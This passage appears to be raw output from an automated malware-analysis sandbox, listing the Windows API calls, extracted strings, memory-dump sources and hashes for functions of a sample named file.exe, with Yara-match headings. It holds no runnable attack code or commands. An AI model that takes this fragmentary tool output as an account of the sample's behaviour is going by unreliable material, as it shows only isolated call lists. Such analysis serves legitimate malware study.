                    • Opcode Fuzzy Hash: e8a399636c21c93f54abecb38cd00bd2a0cdd3abe99d6541657663b6aa6b27b5
                    • Instruction Fuzzy Hash: 8E21B031600B249FCB24EF66E9508BBF3F4FF48304740455EE942A7651CB78E905CBAA
                    APIs
                    • GetLastError.KERNEL32(?,?,044F52A6,044F3E67,044DB8CC,00462014,?,00000000,0044B448,000000FF,?,044C2651,?,?), ref: 044F52BD
                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 044F52CB
                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 044F52E4
                    • SetLastError.KERNEL32(00000000,?,044F52A6,044F3E67,044DB8CC,00462014,?,00000000,0044B448,000000FF,?,044C2651,?,?), ref: 044F5336
                    Memory Dump Source
                    • Source File: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_44c0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorLastValue___vcrt_
                    • String ID:
                    • API String ID: 3852720340-0
                    • Opcode ID: b07de53ced0629e77d54eea71d233bc361282fd8b55c12240ca057c3c3e4afae
                    • Instruction ID: fe1c550c639fed95819e0843187fd72fabcd4d81309bf716c56bcf8e9be9b80a
                    • Opcode Fuzzy Hash: b07de53ced0629e77d54eea71d233bc361282fd8b55c12240ca057c3c3e4afae
                    • Instruction Fuzzy Hash: A801B53260DB217EFF252BB97C8556B2745EB01679721033FE314855E3FFE168029649
                    APIs
                    • GetLastError.KERNEL32(?,?,0043503F,00433C00,0041B665,1F0F83C3,?,00000000,0044B448,000000FF,?,004023EA,?,?), ref: 00435056
                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00435064
                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0043507D
                    • SetLastError.KERNEL32(00000000,?,0043503F,00433C00,0041B665,1F0F83C3,?,00000000,0044B448,000000FF,?,004023EA,?,?), ref: 004350CF
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorLastValue___vcrt_
                    • String ID:
                    • API String ID: 3852720340-0
                    • Opcode ID: b07de53ced0629e77d54eea71d233bc361282fd8b55c12240ca057c3c3e4afae
                    • Instruction ID: 8d24dae537e6274fcf49c1697837548d04e0bffea64ecaf3a521acfb1b817ace
                    • Opcode Fuzzy Hash: b07de53ced0629e77d54eea71d233bc361282fd8b55c12240ca057c3c3e4afae
                    • Instruction Fuzzy Hash: 9A01453220EF226EA22826756C81A1B2665EB09738F30223FF224451E1FECB480092CD
                    APIs
                    • GetLogicalProcessorInformation.KERNEL32(00000000,?,00000000,?,0000FFFF,00000000,?,00000000,?,?,00000000,?,?), ref: 044DFFA0
                    • GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,?,00000000,?,?), ref: 044DFFA6
                    • GetLogicalProcessorInformation.KERNEL32(00000000,?,?,0000FFFF,00000000,?,00000000,?,?,00000000,?,?), ref: 044DFFD3
                    • GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,?,00000000,?,?), ref: 044DFFDD
                    • GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,?,00000000,?,?), ref: 044DFFEF
                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 044E0005
                    Memory Dump Source
                    • Source File: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_44c0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorLast$InformationLogicalProcessor$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error
                    • String ID:
                    • API String ID: 2808382621-0
                    • Opcode ID: c0a4f277fe568b30ff606a76a18e0e24afb7e465af144ec3c514b72e4719e68f
                    • Instruction ID: 1cd92c6a2ab7665081bd8e8edb4d8605347a9653af97e9ffbf1b45d031a24e14
                    • Opcode Fuzzy Hash: c0a4f277fe568b30ff606a76a18e0e24afb7e465af144ec3c514b72e4719e68f
                    • Instruction Fuzzy Hash: B601D435600215ABEF24AB77EC08BBB3768AF4175BB10082BF812E1192EB64F5088764
                    APIs
                    • GetLogicalProcessorInformation.KERNEL32(00000000,?,00000000,?,0000FFFF,00000000,?,00000000,?,?,00000000,?,?), ref: 0041FD39
                    • GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,?,00000000,?,?), ref: 0041FD3F
                    • GetLogicalProcessorInformation.KERNEL32(00000000,?,?,0000FFFF,00000000,?,00000000,?,?,00000000,?,?), ref: 0041FD6C
                    • GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,?,00000000,?,?), ref: 0041FD76
                    • GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,?,00000000,?,?), ref: 0041FD88
                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0041FD9E
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorLast$InformationLogicalProcessor$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error
                    • String ID:
                    • API String ID: 2808382621-0
                    • Opcode ID: c0a4f277fe568b30ff606a76a18e0e24afb7e465af144ec3c514b72e4719e68f
                    • Instruction ID: 4f3bf0f7770c7e5986951e0f5cc567661e6afe5f20b1112d50d855a3cbefbd6a
                    • Opcode Fuzzy Hash: c0a4f277fe568b30ff606a76a18e0e24afb7e465af144ec3c514b72e4719e68f
                    • Instruction Fuzzy Hash: B401FC3554021567DB10ABB2FC05BFF3768EF41712B10483BF402D1152DB2CE94A876D
                    APIs
                    • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00456758), ref: 04502A63
                    • _free.LIBCMT ref: 04502A51
                      • Part of subcall function 044FB0FC: HeapFree.KERNEL32(00000000,00000000,?,044FF3D7,?,00000000,?,?,?,044FF3FE,?,00000007,?,?,044FF800,?), ref: 044FB112
                      • Part of subcall function 044FB0FC: GetLastError.KERNEL32(?,?,044FF3D7,?,00000000,?,?,?,044FF3FE,?,00000007,?,?,044FF800,?,?), ref: 044FB124
                    • _free.LIBCMT ref: 04502C1D
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_44c0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free$ErrorFreeHeapInformationLastTimeZone
                    • String ID: XgE$XgE
                    • API String ID: 2155170405-1765908331
                    • Opcode ID: 758bdd31560fefc84b9d53b96a8230aeae10257a8ae30227f876927d3a6ffae1
                    • Instruction ID: b1fcf955d841a34af023abd679c341163e2a87c4119b38e741bd3fafcd78e346
                    • Opcode Fuzzy Hash: 758bdd31560fefc84b9d53b96a8230aeae10257a8ae30227f876927d3a6ffae1
                    • Instruction Fuzzy Hash: 9E511A79900205ABDB20EF65EC859AAB7B8FF40314F1186EAF510A31D0FBB0BD40AB55
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: mtx_do_lock
                    • String ID: list too long
                    • API String ID: 1389037287-1124181908
                    • Opcode ID: bb80dab446aa7d14bc6a9cac732c978a2268850f800d367491a8692ac82611e5
                    • Instruction ID: 0e9caaf664b056db8b3abed6a1863efd26c2cb81634f27bb393a251f38098771
                    • Opcode Fuzzy Hash: bb80dab446aa7d14bc6a9cac732c978a2268850f800d367491a8692ac82611e5
                    • Instruction Fuzzy Hash: C551DB71D44718ABDB20DF65CC86BDAB3B8EF14704F0041ABF81DA7281E778AD858B59
                    APIs
                    • FindSITargetTypeInstance.LIBVCRUNTIME ref: 00434F7E
                    • FindMITargetTypeInstance.LIBVCRUNTIME ref: 00434F97
                    • PMDtoOffset.LIBCMT ref: 00434FBD
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: FindInstanceTargetType$Offset
                    • String ID: Bad dynamic_cast!
                    • API String ID: 1467055271-2956939130
                    • Opcode ID: 0521f5f12162b5f940dd835c7097114a2cc624e250e977d47238f7f30b439742
                    • Instruction ID: c3d998d34e3c5e6d783fab50cb8decc3bcb55afa041ecdf7956987aee26e1d96
                    • Opcode Fuzzy Hash: 0521f5f12162b5f940dd835c7097114a2cc624e250e977d47238f7f30b439742
                    • Instruction Fuzzy Hash: CB212732A04205AFDF14DF64D906EEE77A4EBCC724F24521BF90493280DB39FD0186A9
                    APIs
                    • Concurrency::details::ThreadProxy::SuspendExecution.LIBCMT ref: 00431993
                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 004319B2
                    • Concurrency::details::FreeVirtualProcessorRoot::SpinUntilIdle.LIBCONCRT ref: 004319F9
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::$ExecutionFreeIdleProcessorProxy::Root::SpinSuspendThreadUntilVirtualstd::invalid_argument::invalid_argument
                    • String ID: pContext
                    • API String ID: 1284976207-2046700901
                    • Opcode ID: 7696fed31027723f35f026be7f56ee9a288ab6992535e51fad3a21373ee75dd4
                    • Instruction ID: 1c2ff945bfb3779234e5a6cf3f9012e4fdc6cf8487c5ad4306e8c2bd46a22409
                    • Opcode Fuzzy Hash: 7696fed31027723f35f026be7f56ee9a288ab6992535e51fad3a21373ee75dd4
                    • Instruction Fuzzy Hash: 52212935700215ABCB18AB25D8A4B7E73A5BF98335F04116BE511873F2CF6CAC45CA99
                    Strings
                    • C:\Users\user\Desktop\file.exe, xrefs: 044FE2F2
                    Memory Dump Source
                    • Source File: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_44c0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: C:\Users\user\Desktop\file.exe
                    • API String ID: 0-3695852857
                    • Opcode ID: c2b0de2763c86ad6614d27659a9b599b6b937d4051c2e6d32a144a313df7ce7a
                    • Instruction ID: b09d3e736b9c4b870718be87de731fe365336532378017fac3500ac75ab54279
                    • Opcode Fuzzy Hash: c2b0de2763c86ad6614d27659a9b599b6b937d4051c2e6d32a144a313df7ce7a
                    • Instruction Fuzzy Hash: FF218371600605AFEF20AF62DC84D6B775DEB0026A720452AFB1D972A1FF35FC418BA1
                    Strings
                    • C:\Users\user\Desktop\file.exe, xrefs: 0043E08B
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: C:\Users\user\Desktop\file.exe
                    • API String ID: 0-3695852857
                    • Opcode ID: d976a1582a0ea40e6d34111d7caa758c1d1378cc5cd5895febd347388f405018
                    • Instruction ID: f4dc822ff7adfef32422cf1d068892eb60ac2f919edbcc6374e1cafa7be57565
                    • Opcode Fuzzy Hash: d976a1582a0ea40e6d34111d7caa758c1d1378cc5cd5895febd347388f405018
                    • Instruction Fuzzy Hash: C121C5B1605215BFDB206F639C81E6777BDEF08368F20651AF52497381E779EC408BA8
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: _wcsrchr
                    • String ID: .bat$.cmd$.com$.exe
                    • API String ID: 1752292252-4019086052
                    • Opcode ID: 76ed5b3c9a0d73b5894b50308dce038bad0a816de482078dd29a63f31f2b0ceb
                    • Instruction ID: d16564c9a29a3a8969ec7240e5edfb42ca856ad351659fd50751cb54bcf8bce3
                    • Opcode Fuzzy Hash: 76ed5b3c9a0d73b5894b50308dce038bad0a816de482078dd29a63f31f2b0ceb
                    • Instruction Fuzzy Hash: 23010867608616312635A0199C02B7B57988F9ABB4F25102FFC94F76C3DE8CDC0291EC
                    APIs
                    • Concurrency::details::SchedulingNode::AddVirtualProcessor.LIBCONCRT ref: 00425011
                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00425034
                    • Concurrency::details::CacheLocalScheduleGroupSegment::CacheLocalScheduleGroupSegment.LIBCONCRT ref: 00425076
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: CacheConcurrency::details::GroupLocalSchedule$Node::ProcessorSchedulingSegmentSegment::Virtualstd::invalid_argument::invalid_argument
                    • String ID: count$ppVirtualProcessorRoots
                    • API String ID: 18808576-3650809737
                    • Opcode ID: ee74751cda2579e54f441aeaee73b0045bcbbb17f9a78e7efd1f60961086b841
                    • Instruction ID: 305bc4034c2cb983e96c2d8fe25bce993a68233bb1d7dc822cb2e33d84effcaf
                    • Opcode Fuzzy Hash: ee74751cda2579e54f441aeaee73b0045bcbbb17f9a78e7efd1f60961086b841
                    • Instruction Fuzzy Hash: 6821E035B00225EFCB04EF69D881AAD73A1FF48304F50402FE90597691DF75AE01CB89
                    APIs
                    • GetLastError.KERNEL32(?,?,?,044F6CC1,?,?,?,?,044F78F5,?), ref: 044FA97D
                    • _free.LIBCMT ref: 044FA9DA
                    • _free.LIBCMT ref: 044FAA10
                    • SetLastError.KERNEL32(00000000,00462170,000000FF,?,?,044F6CC1,?,?,?,?,044F78F5,?), ref: 044FAA1B
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_44c0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorLast_free
                    • String ID: x!F
                    • API String ID: 2283115069-3062043068
                    • Opcode ID: 826befe5908a36a329c0b68ecd7869063ec108b53a76503526fd19857e2e3b2b
                    • Instruction ID: e121d2cc9ce6a816ddf4ab89f65e7413dd27dd45986cc7de4a454dc214eedbf5
                    • Opcode Fuzzy Hash: 826befe5908a36a329c0b68ecd7869063ec108b53a76503526fd19857e2e3b2b
                    • Instruction Fuzzy Hash: 82112C32704A00FEEF2167B6EC84D2B2199DBC2779B25063BF328A21E1ED61BC064116
                    APIs
                    • GetLastError.KERNEL32(?,?,?,00436A5A,?,?,?,?,0043768E,?), ref: 0043A716
                    • _free.LIBCMT ref: 0043A773
                    • _free.LIBCMT ref: 0043A7A9
                    • SetLastError.KERNEL32(00000000,00000008,000000FF,?,?,00436A5A,?,?,?,?,0043768E,?), ref: 0043A7B4
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorLast_free
                    • String ID: x!F
                    • API String ID: 2283115069-3062043068
                    • Opcode ID: 826befe5908a36a329c0b68ecd7869063ec108b53a76503526fd19857e2e3b2b
                    • Instruction ID: be7c44a1fb34d1c37a26770ceb7c848a23a0808e2611b486d4a83bfcf4870b79
                    • Opcode Fuzzy Hash: 826befe5908a36a329c0b68ecd7869063ec108b53a76503526fd19857e2e3b2b
                    • Instruction Fuzzy Hash: 9A110D312847003AD61127755CC6E2B2169D7D9379F25213FF360862D1EFADCC16425F
                    APIs
                    • GetLastError.KERNEL32(?,?,?,044F788F,044C246E), ref: 044FAAD4
                    • _free.LIBCMT ref: 044FAB31
                    • _free.LIBCMT ref: 044FAB67
                    • SetLastError.KERNEL32(00000000,00462170,000000FF,?,044F788F,044C246E), ref: 044FAB72
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_44c0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorLast_free
                    • String ID: x!F
                    • API String ID: 2283115069-3062043068
                    • Opcode ID: c8ad822cd170ee70e40dfd3b9bf10ba13b5f2f5e684597da726ebd4380a789db
                    • Instruction ID: 77c1258835eefb62526eb2fff6cdbe0c449defc09781fa53a2720c5499316cd5
                    • Opcode Fuzzy Hash: c8ad822cd170ee70e40dfd3b9bf10ba13b5f2f5e684597da726ebd4380a789db
                    • Instruction Fuzzy Hash: A8110C35714B01FEEF216B76AC84D6B259EDBC2779B14023BF728A22E1EDA1BC064115
                    APIs
                    • GetLastError.KERNEL32(?,?,?,00437628,00402207), ref: 0043A86D
                    • _free.LIBCMT ref: 0043A8CA
                    • _free.LIBCMT ref: 0043A900
                    • SetLastError.KERNEL32(00000000,00000008,000000FF,?,00437628,00402207), ref: 0043A90B
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorLast_free
                    • String ID: x!F
                    • API String ID: 2283115069-3062043068
                    • Opcode ID: c8ad822cd170ee70e40dfd3b9bf10ba13b5f2f5e684597da726ebd4380a789db
                    • Instruction ID: b986b1826898f37416bf5ced70f3374c8b36f31c2da29752778e1ed8a3b37dc0
                    • Opcode Fuzzy Hash: c8ad822cd170ee70e40dfd3b9bf10ba13b5f2f5e684597da726ebd4380a789db
                    • Instruction Fuzzy Hash: 5A112C312847003AC61573755C42F2B2259EBC93B9F24213FF264962D1EA6D8C17411F
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: api-ms-
                    • API String ID: 0-2084034818
                    • Opcode ID: 0f756fd091728f1714fffd2efd6505197b9063550eda6cdbc8ad120b831c3f96
                    • Instruction ID: 24afc57fe78e1c6608cbdf562ed4d7e6d93aa0af096ef472e59e5906e3cd28f5
                    • Opcode Fuzzy Hash: 0f756fd091728f1714fffd2efd6505197b9063550eda6cdbc8ad120b831c3f96
                    • Instruction Fuzzy Hash: 7E110F31A01326BBCF324B68DC44A1F77659F09771F225123ED16A7392D674ED00C6E8
                    APIs
                    • StructuredWorkStealingQueue.LIBCMT ref: 044F242C
                    • Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 044F243D
                    • StructuredWorkStealingQueue.LIBCMT ref: 044F2473
                    • Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 044F2484
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_44c0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Work$Concurrency::details::ItemItem::QueueStealingStructured
                    • String ID: e
                    • API String ID: 3804418703-4024072794
                    • Opcode ID: 1b6716c63c17d6c6149872910042524b7f9ebb3f5e3c7538eb01a51a2faaeb53
                    • Instruction ID: 841be8bd8d3f76f991b1095c36ed4c8f9a13355bdaa07f55669fdce0425dba7b
                    • Opcode Fuzzy Hash: 1b6716c63c17d6c6149872910042524b7f9ebb3f5e3c7538eb01a51a2faaeb53
                    • Instruction Fuzzy Hash: ED11CA31200205ABEF24DE6DCC8176B77A4BF02255B14C5EBED069F252DBF2F9018BA1
                    APIs
                    • StructuredWorkStealingQueue.LIBCMT ref: 004321C5
                    • Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 004321D6
                    • StructuredWorkStealingQueue.LIBCMT ref: 0043220C
                    • Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 0043221D
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Work$Concurrency::details::ItemItem::QueueStealingStructured
                    • String ID: e
                    • API String ID: 3804418703-4024072794
                    • Opcode ID: 1b6716c63c17d6c6149872910042524b7f9ebb3f5e3c7538eb01a51a2faaeb53
                    • Instruction ID: 9b603a7df0a9b275827e5962de0d870e8733e561ac416f5c4f25b928dcbe72b5
                    • Opcode Fuzzy Hash: 1b6716c63c17d6c6149872910042524b7f9ebb3f5e3c7538eb01a51a2faaeb53
                    • Instruction Fuzzy Hash: D911E7311001019BDF55DE69DF41A6B73A49F0A364F1890ABEC069F202CAB9D901CB99
                    APIs
                    • Sleep.KERNEL32(00000064), ref: 044CAB9A
                    • CreateMutexA.KERNEL32(00000000,00000000,00463224), ref: 044CABB8
                    • GetLastError.KERNEL32 ref: 044CABC0
                    • GetLastError.KERNEL32 ref: 044CABD1
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_44c0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorLast$CreateMutexSleep
                    • String ID: $2F
                    • API String ID: 3645482037-2999617530
                    • Opcode ID: abf828106290c8285b3a59e7965c404706129166012535d5085106ddaca65b9d
                    • Instruction ID: 84d255a525831a3e33a321f8ae39f34a677cf6d5740d445a54ee46c252c4b70c
                    • Opcode Fuzzy Hash: abf828106290c8285b3a59e7965c404706129166012535d5085106ddaca65b9d
                    • Instruction Fuzzy Hash: 8501F435540304EBEB509F68FC08F5A77B5E704F12F500A3AF615D76D0EB78A444872A
                    APIs
                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,00436672,?,?,0043663A,?,?,?), ref: 00436692
                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 004366A5
                    • FreeLibrary.KERNEL32(00000000,?,?,00436672,?,?,0043663A,?,?,?), ref: 004366C8
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: AddressFreeHandleLibraryModuleProc
                    • String ID: CorExitProcess$mscoree.dll
                    • API String ID: 4061214504-1276376045
                    • Opcode ID: 149a4b1e0247f71675fe1653e9c2ac55fef454062cb741321ed7f61413657623
                    • Instruction ID: a844e345ecaf6b3645b807ab58af657e8cb037a566189496e486508311f4ef5d
                    • Opcode Fuzzy Hash: 149a4b1e0247f71675fe1653e9c2ac55fef454062cb741321ed7f61413657623
                    • Instruction Fuzzy Hash: 8EF08235501319FBCB119B91DD0EB9E7A79EB04797F104062FC04A22A1CB78CE04DB9C
                    APIs
                    • GetCPInfo.KERNEL32(029512F8,029512F8,?,7FFFFFFF,?,?,00446B05,029512F8,029512F8,?,029512F8,?,?,?,?,029512F8), ref: 004468EC
                    • __alloca_probe_16.LIBCMT ref: 004469A2
                    • __alloca_probe_16.LIBCMT ref: 00446A38
                    • __freea.LIBCMT ref: 00446AA3
                    • __freea.LIBCMT ref: 00446AAF
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: __alloca_probe_16__freea$Info
                    • String ID:
                    • API String ID: 2330168043-0
                    • Opcode ID: cbaa4673f5ff8862db29272040ab2082dd50e9928e22af3abc04efc5db2fe98c
                    • Instruction ID: 10efd5a829d972edac5f7f177fa14af3cd2182f54b741c455361477a6b2ea80f
                    • Opcode Fuzzy Hash: cbaa4673f5ff8862db29272040ab2082dd50e9928e22af3abc04efc5db2fe98c
                    • Instruction Fuzzy Hash: AD810472D006059BEF209E658841AEF7BB9EF4B714F1A401BE904B7240E779CC45CBAA
                    APIs
                    • __alloca_probe_16.LIBCMT ref: 00444D38
                    • __alloca_probe_16.LIBCMT ref: 00444DFE
                    • __freea.LIBCMT ref: 00444E6A
                      • Part of subcall function 0043B0EB: HeapAlloc.KERNEL32(00000000,?,?,?,0043E590,00000220,?,?,?,?,?,?,0043768E,?), ref: 0043B11D
                    • __freea.LIBCMT ref: 00444E73
                    • __freea.LIBCMT ref: 00444E96
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: __freea$__alloca_probe_16$AllocHeap
                    • String ID:
                    • API String ID: 1096550386-0
                    • Opcode ID: ed981a726e34d29eec07117bbe85d43771450238645a1f4fbecfa0b3ca24f07d
                    • Instruction ID: e3ec7627a5ea34dccdb9b477d1aea9347458ee8b8e155340acbb0e069fb26b32
                    • Opcode Fuzzy Hash: ed981a726e34d29eec07117bbe85d43771450238645a1f4fbecfa0b3ca24f07d
                    • Instruction Fuzzy Hash: 1C51A372A00216AFFB215F95DC81FAB77A9EFC4764F25012BFD0497250E738DC5186A8
                    Memory Dump Source
                    • Source File: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_44c0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: f45b3cd53f4fbe66f848a6647b5ae0f8d5b032d3043932f0518009a9766fdba2
                    • Instruction ID: 09acd1fe8b8f74f35dee1638a35df2bd0c8ec6e843e8982afef8690ad2f191ce
                    • Opcode Fuzzy Hash: f45b3cd53f4fbe66f848a6647b5ae0f8d5b032d3043932f0518009a9766fdba2
                    • Instruction Fuzzy Hash: 9C6175B4D04714ABDF20DF65CD89B9AF7B8EF04304F1442AEE80DA7251EB74AA41CB56
                    APIs
                    • __Mtx_unlock.LIBCPMT ref: 0040DEFD
                    • recv.WS2_32(?,?,00001F40,00000000), ref: 0040DF36
                    • recv.WS2_32(?,?,00001F40,00000000), ref: 0040DF64
                    • closesocket.WS2_32(?), ref: 0040DFD8
